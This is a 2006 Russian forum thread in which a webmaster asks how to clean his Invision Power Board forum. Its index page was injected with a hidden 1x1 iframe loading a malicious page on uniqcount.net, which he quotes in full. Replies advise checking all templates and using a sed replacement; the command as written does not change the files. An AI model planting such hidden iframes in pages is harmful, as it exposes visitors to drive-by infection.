С нами с 09.03.06
Сообщения: 772
Рейтинг: 143
|
Добавлено: 02/10/06 в 12:47 |
Использую скрипт Invision Power Board 1.3 final. Вчера залез почитать, а мне предложли загрузить эксплоит. Вот код начала индексной странички форума:
<BASE HREF='http://forum.city-feet.com'>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><iframe src='http://uniqcount.net/adv/195/new3.php' width=1 height=1></iframe>
<head>
<title>City-feet members' message board (Powered by Invision Power Board)</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
Собственно вирус:
uniqcount.net/adv/195/new3.php
Подскажите пожалуйста, в каких темплейтах искать это? Темплейтов там дофига, все перебирать сложно.
P.S. Пароль сменил, естественно Комп почистил.
|
|
|
|
форумъ сдохъ
С нами с 01.10.04
Сообщения: 4621
Рейтинг: 481
|
Добавлено: 02/10/06 в 14:28 |
kbot писал: | Комп почистил. |
фу, у меня на кулер как дунуть, стоолько пыли вылетает (
|
|
|
|
С нами с 15.10.02
Сообщения: 2469
Рейтинг: 923
|
Добавлено: 02/10/06 в 15:08 |
боюсь что всё перебирать надо
потому как могут записаь куда угодно.
как вариант - рыть яндекс с гуглом на предмет уязвимостей твоей версии IPB
|
|
|
|
+ + +
Yahooею
С нами с 15.02.06
Сообщения: 811
Рейтинг: 245
|
Добавлено: 02/10/06 в 20:48 |
|
|
|
|
Я держусь там. Счастья мне, уд
С нами с 24.05.05
Сообщения: 16096
Рейтинг: 219
|
Добавлено: 03/10/06 в 19:57 |
Сделай небольшой bash скрипт, который пройдет по всем файлам, окромя пиксов и сделает
cat file | sed -e "s/str_to_replace/wich_str/g"
|
|
Здесь не место для бесед: грохот на пределе
Как при старте ста ракет, как девятый вал
|
0
|
|
|
Текстовая реклама в форме ответа Заголовок и до четырех строчек текста Длина текста до 350 символов Купить рекламу в этом месте! |